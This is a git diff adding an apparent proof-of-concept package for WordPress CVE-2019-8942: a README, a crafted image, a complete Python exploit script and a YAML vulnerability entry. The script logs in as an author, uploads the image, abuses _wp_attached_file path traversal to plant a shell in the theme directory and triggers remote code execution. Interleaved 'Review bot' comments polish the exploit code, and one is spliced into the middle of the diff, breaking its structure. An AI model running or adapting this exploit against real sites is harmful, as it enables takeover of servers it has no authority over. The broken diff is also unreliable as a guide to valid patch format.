diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..812c6782f3e13fe88129d6473da8abbd4d303308
--- /dev/null
+++ b/cve/WordPress/2019/CVE-2019-8942/README.md
@@ -0,0 +1,28 @@
+# CVE-2019-8942 Proof-of-Concept
+
+### Overview
+
+WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943.
+For a comprehensive understanding, check out the accompanying [blog post](http://blog.nsfocus.net/wordpress-5-0-0-rce/) for in-depth details.
+
+### Dependencies
+
+* python3
+* requests package
+
+### Usage
+
+1. Verify if requests is installed:
+```
+sudo pip3 install requests
+```
+
+2. Modify the "url_root" in poc.py as you wish, for example:
+```
+url_root = 'http://localhost/'
+```
+
+3. Run the PoC:
+```
+python3 ./poc.py
+```
\ No newline at end of file
diff --git a/cve/WordPress/2019/CVE-2019-8942/imagick.jpg b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..26bf6fdc1ad140fd556848ef597d11d9a38efc15
Binary files /dev/null and b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg differ
diff --git a/cve/WordPress/2019/CVE-2019-8942/poc.py b/cve/WordPress/2019/CVE-2019-8942/poc.py
new file mode 100644
index 0000000000000000000000000000000000000000..853e4d08c6f54b2e4deba6c5d2918648051dbfc8
--- /dev/null
+++ b/cve/WordPress/2019/CVE-2019-8942/poc.py
@@ -0,0 +1,97 @@
+#!/usr/bin/python3
+
+######################
+## Imagick RCE POC ##
+######################
+import requests
+import re
+
+url_root = 'http://localhost/'
+theme = 'twentyseventeen'
+current_date = '2019/03/'
+filename = "imagick.jpg"
+
+session = requests.Session()
+creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1}
+tmp={'wordpress_test_cookie':'WP Cookie check'}
+r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds)
+wp_init_cookies=session.cookies
+
+#get nonce
+response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies)
+_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0]
+
+
+#uploading image
+data = {
+ 'post_id': '0',
+ '_wp_http_referer': '/wp-admin/media-new.php',
+ '_wpnonce': _wp_nonce,
+ 'action': 'upload_attachement',
+ 'html-upload': 'Upload'
+}
+evil = {'async-upload':(filename, open(filename, 'rb'))}
+upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies)
+image_id=upload_result.text
+print(f'Image ID: {image_id}')
+
+#First exploit :changing metadata
+#Part 1 create folder ==> evil.jpg?/x
+response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies)
+_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0]
+ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0]
+print(ajax_nonce)
+data={'_wpnonce':_wpnonce,
+'action':'editpost',
+'post_ID':image_id,
+'meta_input[_wp_attached_file]':current_date+filename+'?/x'
+}
+response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies)
+
+#Creating file with wrop-image
+data={'action':'crop-image',
+'_ajax_nonce':ajax_nonce,
+'id':image_id,
+'cropDetails[x1]':0,
+'cropDetails[y1]':0,
+'cropDetails[width]':400,
+'cropDetails[height]':300,
+'cropDetails[dst_width]':10,
+'cropDetails[dst_height]':10}
+response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies)
+
+#Part 2 creating file into current theme
+data={'_wpnonce':_wpnonce,
+'action':'editpost',
+'post_ID':image_id,
+'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell'
+}
+response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies)
+data={'action':'crop-image',
+'_ajax_nonce':ajax_nonce,
+'id':image_id,
+'cropDetails[x1]':0,
+'cropDetails[y1]':0,
+'cropDetails[width]':400,
+'cropDetails[height]':300,
+'cropDetails[dst_width]':10,
+'cropDetails[dst_height]':10}
+response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies)
+print(response.text)
+
+#Including into theme
+response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies)
+_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0]
+post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0]
+print(f'Post ID: {post_id}')
+
+data={'_wpnonce':_wpnonce,
+'action':'editpost',
+'post_ID':post_id,
+'post_title':'wut',
+'post_name':'wut',
+'meta_input[_wp_page_template]':'cropped-shell.jpg'
+}
+response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies)
+
+print(f'Rce at {url_root}?p={post_id}')
\ No newline at end of file
diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..4223ef65fc6d4cb17e9e9d205871bc2243a17f30
--- /dev/null
+++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml
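Review bot: The upload at `evil = {'async-upload':(filename, open(filename, 'rb'))}` opens the image file and never closes it, so the handle leaks for the rest of the run; wrap the post in a context manager instead, `with open(filename, 'rb') as fh:` followed by `    upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files={'async-upload': (filename, fh)}, cookies=wp_init_cookies)`. The script also alternates between `session.post` and the module-level `requests.get`/`requests.post` with an explicit `cookies=wp_init_cookies`, while the `Session` object already carries those cookies; using the one `session` throughout would read more consistently. The bare `print(ajax_nonce)` looks like leftover debugging output next to the labelled `Image ID` and `Post ID` prints and could be dropped or given a label. The README documents only `url_root` as configurable, whereas `theme`, `current_date`, `filename` and the login form values are also hard-coded at the top of the file and deserve a short comment saying they must match the target installation.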
@@ -0,0 +1,21 @@
+id: CVE-2019-8942
+source:
+ https://github.com/synacktiv/CVE-2019-8942
+info:
+ name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。
+ severity: high
+ description: |
+ WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943.
+ scope-of-influence:
+ WordPress < 4.9.9
+ WordPress 5.x < 5.0.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-8942
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-8942
+ cwe-id: CWE-434
+ cnvd-id: None
+ kve-id: None
+ tags: RCE, 远程代码执行
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index fc7663c89bd57e1472b6072d7ca583e1c6d5cb50..a1c0e3e27e5a285db2d2cccd8db83c017da2b920 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -45,4 +45,6 @@ cve:
 - CVE-2022-23131
 Zyxel:
 - CVE-2022-30525
+ WordPress:
+ - CVE-2019-8942
 cnvd:
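Review bot: `cnvd-id: None` and `kve-id: None` are read by a YAML loader as the string `"None"`, not as a null value; if whatever consumes these files treats an absent identifier as null, write `cnvd-id: null` and `kve-id: null` (or leave the value empty). `tags: RCE, 远程代码执行` is likewise a single scalar rather than a sequence, unlike `reference:` a few lines above, which may or may not be what the repository's loader expects. The `name:` field holds a product description (that WordPress is a free open-source CMS) rather than a name for this issue; presumably that follows the repository's other entries, but a vulnerability-specific name would make the entry easier to scan.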